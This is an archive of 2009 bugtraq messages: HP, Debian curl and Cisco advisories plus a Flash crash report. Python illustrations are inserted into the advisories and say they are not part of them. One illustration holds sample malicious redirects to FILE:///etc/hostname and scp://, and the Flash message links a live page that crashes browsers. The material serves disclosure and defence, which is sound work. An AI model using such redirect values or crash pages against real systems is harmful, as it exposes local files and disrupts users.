Last Updated: 2009-03-09
Potential Security Impact: Remote unauthorized access to data, local unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with WMI Mapper for HP Systems Insight Manager running on Windows. The vulnerabilities could be exploited remotely to allow unauthorized access to data or locally to gain unauthorized access.
References: CVE-2009-0712, CVE-2009-0713
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
WMI Mapper for HP Systems Insight Manager prior to v2.5.2.0
BACKGROUND
CVSS 2.0 Base Metrics
==============================================
Reference        Base Vector                    Base Score
CVE-2009-0712    (AV:L/AC:L/Au:S/C:C/I:C/A:N)   6.2
CVE-2009-0713    (AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following software patch to resolve the vulnerability.
The patch can be downloaded from
http://www.hp.com/bizsupport/
WMIMapper2_6_0.msi or subsequent
PRODUCT SPECIFIC INFORMATION
None
HISTORY
Version:1 (rev.1) - 9 March 2009 Initial release
Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSbUbhuAfOvwtKn1ZEQJkFwCdHGcxKKJ05owJj9iPwE0yXFZrNqMAn2Bu
wmU0rQ9+y4JnT3C3/Joa2cBr
=pfZN
-----END PGP SIGNATURE-----
From - Wed Mar 11 17:51:13 2009
Date: Wed, 11 Mar 2009 10:30:49 -0700
Message-ID: <f1dcfaef0903111030y5aefdb48o218689a260adbee6@mail.gmail.com>
Subject: Re: Adobe Flash Player plug-in null pointer dereference and browser crash
From: Matthew Dempsky <matthew@mochimedia.com>
To: bugtraq@securityfocus.com
On Wed, Oct 1, 2008 at 5:46 PM, Matthew Dempsky <matthew@mochimedia.com> wrote:
> If a Flash 9 SWF loads two SWF files with different SWF version
> numbers from two distinct HTTP requests to the exact same URL
> (including query string arguments), then Adobe's Flash Player plug-in
> will try to dereference a null pointer. This issue affects at least
> versions 9.0.45.0, 9.0.112.0, 9.0.124.0, and 10.0.12.10 on Windows, OS
> X, and Linux.
As an update, this issue also affects 10.0.22.87 at least on Windows
and OS X. I've seen some Linux distributions (e.g., [1]) claim that
10.0.22.87 fixes this bug (aka CVE-2008-4546), but I think this is
mistaken.
You can easily reproduce this bug (i.e., crash your browser) by
visiting http://flashcrash.dempsky.org/. Be sure to tell your
friends: it can be the next Rick Roll.
[1] http://www.gentoo.org/security/en/glsa/glsa-200903-23.xml?style=printable
--
Matthew Dempsky
http://www.mochimedia.com
From - Wed Mar 11 18:11:13 2009
Date: Wed, 11 Mar 2009 17:46:54 +0100
From: Nico Golde <nion@debian.org>
Message-ID: <20090311164654.GB23703@ngolde.de>
Subject: [SECURITY] [DSA 1738-1] New curl packages fix arbitrary file access
To: bugtraq@securityfocus.com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA-1738-1                  security@debian.org
http://www.debian.org/security/                               Nico Golde
March 11th, 2009                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : curl
Vulnerability : arbitrary file access
Problem type : remote
Debian-specific: no
CVE ID : CVE-2009-0037
Debian Bug : 518423
BugTraq ID : 33962
David Kierznowski discovered that libcurl, a multi-protocol file transfer
library, when configured to follow URL redirects automatically, does not
validate the new target location. Because libcurl also supports file:// and
scp:// URLs, depending on the setup, an untrusted server could use that
to expose local files, overwrite local files or even execute arbitrary
code via a malicious URL redirect.
This update introduces a new option called CURLOPT_REDIR_PROTOCOLS which by
default does not include the scp and file protocol handlers.
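A model of the behaviour described above, added here as an illustration; it is not part of the advisory and is not libcurl code. It follows Location headers with and without a redirect-protocol allowlist of the kind CURLOPT_REDIR_PROTOCOLS introduces; the host names, the reply map and all function names are constructed for the example.

```python
from urllib.parse import urljoin, urlsplit

# Schemes this model client can speak (constructed for the example).
SUPPORTED_PROTOCOLS = frozenset({"http", "https", "ftp", "file", "scp"})

# Redirect allowlist in the spirit of the fix: everything the client
# supports except the file and scp handlers.
DEFAULT_REDIR_PROTOCOLS = SUPPORTED_PROTOCOLS - {"file", "scp"}

# Constructed server behaviour: URL -> value of the Location header it returns.
REPLIES = {
    "http://mirror.example/pkg.tar.gz": "/v2/pkg.tar.gz",           # relative
    "http://mirror.example/v2/pkg.tar.gz": "//cdn.example/pkg.tar.gz",  # scheme-relative
    "http://cdn.example/pkg.tar.gz": "https://cdn.example/pkg.tar.gz",
    "http://untrusted.example/a": "FILE:///etc/hostname",           # mixed-case scheme
    "http://untrusted.example/b": "scp://files.example/inbox/b",
    "http://untrusted.example/loop": "http://untrusted.example/loop",
}


class RedirectBlocked(Exception):
    """Raised when a Location header points at a disallowed target."""


def next_hop(current_url, location, redir_protocols):
    """Resolve a Location header against the current URL and vet its scheme.

    redir_protocols=None models the pre-fix behaviour: any scheme the client
    supports is followed without a check.
    """
    target = urljoin(current_url, location.strip())
    scheme = urlsplit(target).scheme  # urlsplit lower-cases the scheme
    if scheme not in SUPPORTED_PROTOCOLS:
        raise RedirectBlocked(f"unsupported scheme in redirect: {target}")
    if redir_protocols is not None and scheme not in redir_protocols:
        raise RedirectBlocked(
            f"{scheme}:// not allowed as redirect target: {target}")
    return target


def follow(start_url, server_replies, redir_protocols=None, max_redirs=10):
    """Walk a redirect chain and return every URL the client would access.

    A URL absent from server_replies is treated as a final, non-redirect
    response. At most max_redirs redirects are followed.
    """
    visited = [start_url]
    url = start_url
    while url in server_replies:
        if len(visited) > max_redirs:
            raise RedirectBlocked(f"more than {max_redirs} redirects")
        url = next_hop(url, server_replies[url], redir_protocols)
        visited.append(url)
    return visited


def verdict(start_url, server_replies, redir_protocols):
    """Return ('followed', urls) or ('blocked', reason) for reporting."""
    try:
        return "followed", follow(start_url, server_replies, redir_protocols)
    except RedirectBlocked as exc:
        return "blocked", str(exc)


if __name__ == "__main__":
    starts = ("http://mirror.example/pkg.tar.gz",
              "http://untrusted.example/a",
              "http://untrusted.example/b",
              "http://untrusted.example/loop")
    modes = (("no allowlist", None), ("allowlist", DEFAULT_REDIR_PROTOCOLS))
    for start in starts:
        for label, allowed in modes:
            print(f"{label:12} {start} -> {verdict(start, REPLIES, allowed)}")
```

The initial URL is chosen by the caller and is not subject to the allowlist; only targets named by the server are vetted, which is why ordinary http and https redirects keep working.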
For the oldstable distribution (etch) this problem has been fixed in
version 7.15.5-1etch2.
For the stable distribution (lenny) this problem has been fixed in
version 7.18.2-8lenny2.
For the unstable distribution (sid) this problem has been fixed in
version 7.18.2-8.1.
We recommend that you upgrade your curl packages.
Upgrade instructions
- --------------------
wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Debian (oldstable)
- ------------------
Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Size/MD5 checksum: 1179540 551daec15eb2ce16e000b2201dba167c
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 212734 57c377e5cbef3618e283a1e187045598
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 238114 440e40511e414c3a0c3a4f4bfd479a41
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 922274 73c54c0b54c83950728f60d8cc1727ea
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_powerpc.deb
Size/MD5 checksum: 222642 74220c8c71a4a5d9af54694d9777a9b0
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 223330 8c5ca7bc3655a68e2fc33d11ecc06865
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 209294 e28839caee56080274e61541e035af52
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 1190688 bd391c517d8ec4b5179f753ef73825a9
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 931312 dc473f1db5201689c7cb15f41929f780
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 239904 5f08a1a17220525e249e6dec32a21bfb
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_s390.deb
Size/MD5 checksum: 912728 368e5d51de6826fce49b35e728a52dda
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 207660 84f75b95a33d19a1027b281c136f38ca
http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 208576 4ac3ac2bb012ba68a1872620cc90e3a3
http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 1134708 3403c94f0c0c32c1e964364337132456
http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 222562 990364878bde2699a2af470013f90fce
http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 902436 8f221c8abaab29401bd0434b9add83c8
http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_sparc.deb
Size/MD5 checksum: 918590 2d0b3f1dc2882cc2446ed708c2f2b55e
These files will probably be moved into the stable distribution on
its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
From - Wed Mar 11 18:31:14 2009
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco Unified Communications Manager IP Phone Personal Address Book Synchronizer Privilege Escalation Vulnerability
Date: Wednesday, 11 March 2009 10:40:00 -0500
Message-id: <200903111040.cucmpab@psirt.cisco.com>
Cisco Security Advisory: Cisco Unified Communications Manager IP
Phone Personal Address Book Synchronizer Privilege Escalation
Vulnerability
Advisory ID: cisco-sa-20090311-cucmpab
Revision 1.0
For Public Release 2009 March 11 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
======
Cisco Unified Communications Manager, formerly CallManager, contains
a privilege escalation vulnerability in the IP Phone Personal Address
Book (PAB) Synchronizer feature that may allow an attacker to gain
complete administrative access to a vulnerable Cisco Unified
Communications Manager system. If Cisco Unified Communications
Manager is integrated with an external directory service, it may be
possible for an attacker to leverage the privilege escalation
vulnerability to gain access to additional systems configured to use
the directory service for authentication.
Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml
Affected Products
================
Vulnerable Products
+------------------
The following products are vulnerable:
* Cisco Unified CallManager 4.1 versions
* Cisco Unified Communications Manager 4.2 versions prior to 4.2(3)SR4b
* Cisco Unified Communications Manager 4.3 versions prior to 4.3(2)SR1b
* Cisco Unified Communications Manager 5.x versions prior to 5.1(3e)
* Cisco Unified Communications Manager 6.x versions prior to 6.1(3)
* Cisco Unified Communications Manager 7.0 versions prior to 7.0(2)
Administrators of systems that are running Cisco Unified
Communications Manager software version 4.x can determine the
software version by navigating to Help > About Cisco Unified
CallManager and selecting the Details button via the Cisco Unified
Communications Manager administration interface.
Administrators of systems that are running Cisco Unified
Communications Manager software versions 5.x, 6.x, and 7.x can
determine the software version by viewing the main page of the Cisco
Unified Communications Manager administration interface. The software
version can also be determined by running the command show version
active via the command line interface (CLI).
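The affected-version list above can be applied to an inventory mechanically. The following is an added example, not Cisco's code: it parses version strings in the form the advisory uses, such as 4.2(3)SR4b, and compares them with the fixed releases named above. The sort order of letter and SR suffixes and the sample host names are assumptions.

```python
import re

# Fixed releases per release train, from the advisory's "Vulnerable Products" list.
# A minor of None means the whole major train (the advisory's "5.x" and "6.x").
FIXED_RELEASES = {
    (4, 2): "4.2(3)SR4b",
    (4, 3): "4.3(2)SR1b",
    (5, None): "5.1(3e)",
    (6, None): "6.1(3)",
    (7, 0): "7.0(2)",
}
# Every 4.1 release is listed as vulnerable; the advisory points 4.1 systems
# to 4.2(3)SR4b for fixed software.
NO_FIX_IN_TRAIN = {(4, 1): "4.2(3)SR4b"}

VERSION_RE = re.compile(
    r"^\s*(\d+)\.(\d+)\((\d+)([a-z]?)\)\s*(?:SR(\d+)([a-z]?))?\s*$",
    re.IGNORECASE,
)


def parse_version(text):
    """Turn '4.2(3)SR4b' into a tuple that sorts in release order.

    Assumption: a letter suffix sorts after the bare number, and a service
    release (SR) sorts after the base release it applies to.
    """
    m = VERSION_RE.match(text)
    if m is None:
        raise ValueError("unrecognised version string: %r" % (text,))
    major, minor, maint, letter, sr, sr_letter = m.groups()
    return (int(major), int(minor), int(maint), letter.lower(),
            int(sr or 0), (sr_letter or "").lower())


def classify(text):
    """Return (status, fixed_release) for one version string."""
    version = parse_version(text)
    train = version[:2]
    if train in NO_FIX_IN_TRAIN:
        return ("vulnerable", NO_FIX_IN_TRAIN[train])
    fixed = FIXED_RELEASES.get(train) or FIXED_RELEASES.get((version[0], None))
    if fixed is None:
        # Train is not named in the advisory; do not guess either way.
        return ("not listed", None)
    status = "vulnerable" if version < parse_version(fixed) else "fixed"
    return (status, fixed)


def triage(inventory):
    """Classify a {host: version} mapping; unparsable strings need manual review."""
    results = {}
    for host, text in inventory.items():
        try:
            results[host] = classify(text)
        except ValueError:
            results[host] = ("unparsed", None)
    return results


# Constructed inventory: host names and versions are sample data.
SAMPLE_INVENTORY = {
    "ccm-hq-pub": "4.1(3)SR8",
    "ccm-hq-sub": "4.2(3)SR4a",
    "ccm-lab": "4.2(3)SR4b",
    "cucm-branch1": "5.1(3d)",
    "cucm-branch2": "6.1(3)",
    "cucm-dr": "7.0(1)",
    "cucm-new": "6.1.2.1000-13",  # different notation, reported as unparsed
}

if __name__ == "__main__":
    for host, (status, fixed) in sorted(triage(SAMPLE_INVENTORY).items()):
        print("%-14s %-18s %-11s fix: %s" % (host, SAMPLE_INVENTORY[host], status, fixed))
```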
Products Confirmed Not Vulnerable
+--------------------------------
Cisco Unified Communications Manager Express is not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.
Details
======
The Cisco IP Phone Personal Address Book (PAB) Synchronizer feature
of Cisco Unified Communications Manager allows users to keep their
Cisco Unified Communications Manager address book synchronized with
their Microsoft Windows address book. The IP Phone PAB Synchronizer
feature contains a privilege escalation vulnerability that may allow
an attacker to obtain complete administrative access to a vulnerable
Cisco Unified Communications Manager system. After an IP Phone PAB
Synchronizer client successfully authenticates to a Cisco Unified
Communications Manager device over an HTTPS connection, the Cisco
Unified Communications Manager returns credentials for a user account
that is used to manage the Cisco Unified Communications Manager
directory service. If an attacker is able to intercept the
credentials, they can perform unauthorized modifications to the Cisco
Unified Communications Manager configuration and extend their
privileges. The IP Phone PAB Synchronizer client has been redesigned
to allow address book synchronization without requiring the directory
service credentials. This vulnerability does not allow an attacker to
gain access to the underlying platform operating system of any Cisco
Unified Communications Manager system.
Cisco Unified Communications Manager 4.x
+---------------------------------------
Cisco Unified Communications Manager software version 4.x by default
stores user information using an internal Lightweight Directory
Access Protocol (LDAP) server called DC Directory. After an IP Phone
PAB Synchronizer client successfully authenticates, the Cisco Unified
Communications Manager returns credentials for the DC Directory user
that will be used by the client to synchronize a user's address book.
Depending on how a Cisco Unified Communications Manager is
configured, an attacker may obtain different privilege levels using
the intercepted credentials.
By default, Cisco Unified Communications Manager software version 4.x
administrator accounts are created as part of an underlying Microsoft
Windows operating system. Cisco Unified Communications Manager is
commonly deployed using the Multi-Level Administration (MLA) feature
to ease the integration of Cisco Unified Communications Manager into
enterprise environments. If MLA is enabled, Cisco Unified
Communications Manager stores administrator accounts in the Cisco
Unified Communications Manager DC Directory service. If an attacker
obtains the DC Directory credentials and MLA is enabled, the attacker
can add an existing account to the Cisco Unified Communications
Manager super-user group. The attacker can then access the Cisco
Unified Communications Manager management interface with complete
administrative access. If MLA is not enabled, the attacker cannot
escalate their privileges; however, they can modify any user settings
in the directory.
The Cisco Unified Communications Manager 4.x IP Phone PAB
Synchronizer client uses an unencrypted LDAP connection to perform
address book synchronization. The DC Directory credentials are passed
in the clear over the network and are vulnerable to being sniffed by
an attacker. If using the DC Directory internal LDAP server, the IP
Phone PAB Synchronizer client communicates to Cisco Unified
Communications Manager on TCP ports 8404 and 8405.
Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------
Cisco Unified Communications Manager software versions 5.x, 6.x, and
7.x store user information as a part of the internal Cisco Unified
Communications Manager configuration database. The IP Phone PAB
Synchronizer client uses the AXL application programming interface
(API) to perform address book synchronization. After a client
successfully authenticates, the Cisco Unified Communications Manager
returns credentials for a database user account named TabSyncSysUser
that will be used by the client to synchronize a user's address
book. The TabSyncSysUser account has full read and write privileges
to the Cisco Unified Communications Manager configuration database.
Using the TabSyncSysUser credentials via the AXL API, an attacker can
modify any parameter in the database including creating new
administrator accounts.
Directory Service Integration
+----------------------------
Cisco Unified Communications Manager software versions 4.x, 5.x, 6.x,
and 7.x can be integrated with Microsoft Active Directory and several
non-Microsoft LDAP servers to perform user authentication. In order
to function properly, the integration process requires that
appropriate user credentials for the directory service are provided
to Cisco Unified Communications Manager. If an attacker intercepts or
sniffs the directory service credentials returned by a Cisco Unified
Communications Manager responding to an IP Phone PAB Synchronizer
client, the attacker may be able to leverage the credentials to gain
access to additional systems configured to use the directory service
for authentication.
Administrators should ensure that any directory service credentials
used for the Cisco Unified Communications Manager integration process
are configured to follow the principle of least privilege. The
credentials should be configured with only the privileges necessary
to access the directory service data needed for the integration
process to function properly. The use of overly privileged
administrator accounts is discouraged. Please see the Workarounds
section for more information on performing the integration of Cisco
Unified Communications Manager with AD using the least privilege
concept.
This vulnerability is documented in Cisco Bug IDs CSCso76587 and
CSCso78528 and has been assigned Common Vulnerabilities and Exposures
(CVE) identifier CVE-2009-0632.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCso76587 - Directory Manager password sent in clear from client
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCso78528 - TabSyncSysUser (axl user) password sent in clear from client
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of this vulnerability may allow an attacker
to intercept user credentials that allow the attacker to escalate
their privilege level and obtain complete administrative access to a
vulnerable Cisco Unified Communications Manager system. If integrated
with an external directory service, the intercepted user credentials
may allow an attacker to gain access to additional systems configured
to use the directory service for authentication.
Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Cisco Unified Communications Manager software version 4.2(3)SR4b
contains the fix for this vulnerability. Administrators of Cisco
Unified CallManager software version 4.1 systems are encouraged to
upgrade to Cisco Unified Communications Manager software version
4.2(3)SR4b in order to obtain fixed software. Version 4.2(3)SR4b can be
downloaded at the following link:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=280264388&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20CallManager%20Version%204.2&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 4.3(2)SR1b
contains the fix for this vulnerability. Version 4.3(2)SR1b can be
downloaded at the following link:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=280771554&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%204.3&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 5.1(3e)
contains the fix for this vulnerability. Version 5.1(3e) can be
downloaded at the following link:
http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=null&isPlatform=Y&mdfid=280735907&sftType=Unified%20Communications%20Manager%20Updates&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20Communications%20Manager%20Version%205.1&mdfLevel=Software%20Version/Option&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 6.1(3) contains
the fix for this vulnerability. Version 6.1(3) can be downloaded at
the following link:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=281023410&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%206.1&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 7.0(2) contains
the fix for this vulnerability. Version 7.0(2) can be downloaded at
the following link:
http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=&isPlatform=Y&mdfid=281941895&sftType=Unified+Communications+Manager+Updates&treeName=Voice+and+Unified+Communications&modelName=Cisco+Unified+Communications+Manager+Version+7.0&mdfLevel=Software%20Version/Option&treeMdfId=278875240&modifmdfid=null&imname=&hybrid=Y&imst=N
Workarounds
==========
It is possible to mitigate this vulnerability using the following
workarounds.
Cisco Unified Communications Manager 4.x
+---------------------------------------
It is possible to mitigate this vulnerability by moving the ASP
script that IP Phone Personal Address Book (PAB) Synchronizer
clients interact with to a directory location that is not accessible
to the Cisco Unified Communications Manager web server. The system
drive where the ASP script resides depends on how Cisco Unified
Communications Manager was installed. Employing this workaround will
prevent address book synchronization; however, the PAB application
will continue to function. The ASP script can be moved using the
following command:
C:\> move c:\CiscoWebs\User\LDAPDetails.asp c:\temp
It is also possible to mitigate this vulnerability by implementing
filtering on screening devices or using the Windows firewall.
Administrators are advised to permit access to TCP ports 8404 and
8405 only from trusted networks.
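Whether the port filtering described above is in effect can be checked against connection logs. The following is an added example, not part of the Cisco advisory: it flags permitted TCP connections to ports 8404 and 8405 on a Cisco Unified Communications Manager host from sources outside the trusted networks. The log format, addresses and trusted ranges are constructed assumptions.

```python
import ipaddress
import re

# TCP ports the advisory names for 4.x PAB Synchronizer / DC Directory traffic.
DC_DIRECTORY_PORTS = {8404, 8405}

# Assumed (constructed) log format:
#   <timestamp> <proto> <src>:<sport> -> <dst>:<dport> <action>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>\S+)\s+"
    r"(?P<src>[0-9.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[0-9.]+):(?P<dport>\d+)\s+(?P<action>\S+)$"
)


def audit_dc_directory_access(lines, cucm_hosts, trusted_cidrs):
    """Return {source_ip: summary} for permitted DC Directory connections
    that did not come from a trusted network."""
    servers = {ipaddress.ip_address(h) for h in cucm_hosts}
    trusted = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m is None:
            continue  # not a connection record in the assumed format
        if m["proto"].upper() != "TCP" or m["action"].upper() != "ALLOW":
            continue  # denied traffic means the filter did its job
        port = int(m["dport"])
        try:
            src = ipaddress.ip_address(m["src"])
            dst = ipaddress.ip_address(m["dst"])
        except ValueError:
            continue  # malformed address
        if dst not in servers or port not in DC_DIRECTORY_PORTS:
            continue
        if any(src in net for net in trusted):
            continue
        entry = findings.setdefault(str(src), {
            "ports": set(), "count": 0,
            "first_seen": m["ts"], "last_seen": m["ts"],
        })
        entry["ports"].add(port)
        entry["count"] += 1
        # ISO 8601 UTC timestamps of equal length compare correctly as strings.
        entry["first_seen"] = min(entry["first_seen"], m["ts"])
        entry["last_seen"] = max(entry["last_seen"], m["ts"])
    return {src: dict(e, ports=sorted(e["ports"])) for src, e in findings.items()}


# Constructed sample data (documentation and private address ranges).
SAMPLE_CUCM_HOSTS = ["10.20.0.5"]
SAMPLE_TRUSTED = ["10.20.1.0/24"]
SAMPLE_LOG = """\
2009-03-11T15:02:11Z TCP 10.20.1.15:49211 -> 10.20.0.5:8404 ALLOW
2009-03-11T15:03:40Z TCP 192.0.2.77:51002 -> 10.20.0.5:8404 ALLOW
2009-03-11T15:03:41Z TCP 192.0.2.77:51003 -> 10.20.0.5:8405 ALLOW
2009-03-11T15:04:02Z TCP 198.51.100.9:40110 -> 10.20.0.5:8405 DENY
2009-03-11T15:05:19Z TCP 192.0.2.77:51010 -> 10.20.0.5:443 ALLOW
2009-03-11T15:06:00Z UDP 203.0.113.4:5060 -> 10.20.0.5:8404 ALLOW
this line is not a connection record
""".splitlines()

if __name__ == "__main__":
    report = audit_dc_directory_access(SAMPLE_LOG, SAMPLE_CUCM_HOSTS, SAMPLE_TRUSTED)
    for src, info in sorted(report.items()):
        print(src, info)
```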
Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------
It is possible to mitigate this vulnerability by restricting the
permissions of the TabSyncSysUser database user account. In the Cisco
Unified Communications Manager Administration interface, navigate to
User Management > Application User and search for the TabSyncSysUser
account. Remove all groups from the account and change the password.
Employing this workaround will prevent address book synchronization;
however, the PAB application will continue to function.
Active Directory Integration
+---------------------------
To improve the security of Cisco Unified Communications Manager
integration with Active Directory (AD), Cisco has produced a
whitepaper that provides a detailed explanation of how to perform
Cisco Unified Communications Manager integration with AD using the
least-privileged principle. The whitepaper can be downloaded here:
http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_tech_note09186a0080a83435.shtml
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090311-cucmpab.shtml
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
